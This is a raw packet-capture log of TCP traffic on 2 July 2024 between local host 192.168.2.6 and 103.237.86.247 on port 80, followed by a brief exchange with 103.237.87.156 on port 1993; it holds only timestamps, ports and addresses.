                  Jul 2, 2024 07:48:58.389817953 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389827967 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389839888 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389851093 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.389854908 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.389880896 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.389893055 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.390590906 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.390603065 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.390614033 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.390625000 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.390635014 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.390645981 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.390646935 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.390657902 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.390665054 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.390670061 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.390686989 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.390691996 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.390698910 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.390711069 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.390722036 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.390724897 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.390733957 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.390747070 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.390748978 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.390762091 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.390790939 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.391531944 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.391544104 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.391554117 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.391563892 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.391576052 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.391580105 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.391587973 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.391599894 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.391611099 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.391613007 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.391622066 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.391633987 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.391638041 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.391647100 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.391659021 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.391660929 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.391670942 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.391680956 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.391685009 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.391696930 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.391721964 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.392462969 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.392476082 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.392492056 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.392503977 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.392512083 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.392514944 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.392528057 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.392539024 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.392549992 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.392549992 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.392563105 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.392575026 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.392576933 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.392585993 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.392596960 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.392597914 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.392608881 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.392610073 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.392637014 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.393445015 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.393456936 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.393471956 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.393482924 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.393492937 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.393492937 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.393507004 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.393516064 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.393520117 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.393531084 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.393532991 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.393546104 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.393558025 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.393563986 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.393570900 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.393583059 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.393583059 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.393594980 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.393606901 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.393624067 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.393646955 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.394170046 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.394182920 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.394213915 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:48:58.476064920 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.476082087 CEST8049711103.237.86.247192.168.2.6
                  Jul 2, 2024 07:48:58.476248980 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:29.687733889 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:29.692945004 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:29.693038940 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:29.693677902 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:29.698486090 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:30.665344000 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:30.665368080 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:30.665380001 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:30.665462017 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:30.665474892 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:30.665476084 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:30.665518999 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:30.924355984 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:30.924396992 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:30.924410105 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:30.924428940 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.229023933 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.229072094 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.229413986 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.229464054 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.479403973 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479433060 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479454994 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479470968 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479480982 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479504108 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.479504108 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.479553938 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.479605913 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479615927 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479662895 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479667902 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.479674101 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479684114 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479701996 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.479749918 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.480077028 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480087042 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480096102 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480106115 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480115891 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480161905 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.480204105 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.480293036 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480384111 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.480415106 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480426073 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480433941 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480444908 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480453968 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480463028 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480472088 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480519056 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.480534077 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.480967045 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481002092 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481013060 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481018066 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481024027 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481035948 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481039047 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481049061 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481060028 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481071949 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481082916 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481093884 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481100082 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481100082 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481110096 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481120110 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481147051 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481147051 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481175900 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481654882 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481667042 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481678009 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481688023 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481698990 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481709003 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481771946 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481956005 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481971025 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481987953 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481998920 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482008934 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482019901 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482029915 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482033014 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482048035 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482059002 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482064962 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482064962 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482069969 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482083082 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482115984 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482161045 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482831955 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482844114 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482852936 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482863903 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482877016 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482887030 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482898951 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482903957 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482912064 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482923031 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482933998 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482933998 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482933998 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482945919 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482955933 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482956886 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482969046 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482980013 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483030081 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483030081 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483607054 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483618021 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483628988 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483695030 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483695030 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483726978 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483738899 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483747959 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483760118 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483769894 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483781099 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483792067 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483803034 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483804941 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483804941 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483814001 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483824968 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483827114 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483835936 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483865023 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483876944 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.484683990 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484694958 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484704971 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484715939 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484725952 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484736919 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484745979 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484754086 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.484754086 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.484755993 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484770060 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484780073 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484791040 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484791040 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.484791040 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.484802961 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484813929 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484824896 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484831095 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.484863997 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.484863997 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.485558033 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485570908 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485580921 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485591888 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485603094 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485620022 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485630035 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485634089 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.485634089 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.485642910 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485654116 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485656023 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.485677004 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.485698938 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.485955000 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486025095 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486028910 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.486036062 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486087084 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.486134052 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486172915 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486273050 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.486299992 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486310959 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486316919 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486326933 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486336946 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486347914 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486356974 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.486377001 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.486407042 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.486593008 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486604929 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486614943 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486641884 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.486675978 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.570991039 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571058035 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571069956 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571199894 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571212053 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571222067 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571233034 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571247101 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.571327925 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.571482897 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571495056 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571505070 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571516991 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571527004 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571542025 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.571573973 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.571573973 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.740291119 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740397930 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740407944 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740474939 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.740490913 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740504980 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740514994 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740525961 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740546942 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.740561962 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.740788937 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740798950 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740845919 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.740936041 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740947008 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740957022 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740992069 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.740992069 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.741027117 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741038084 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741045952 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741055965 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741066933 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741076946 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741086960 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741095066 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.741121054 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.741121054 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.741620064 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741694927 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.827682972 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.827773094 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:35.442249060 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:35.448462963 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:35.448549032 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:35.458380938 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:35.463159084 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:36.469933033 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:36.514381886 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:36.777503967 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:36.784884930 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:36.789683104 CEST199349721103.237.87.156192.168.2.6
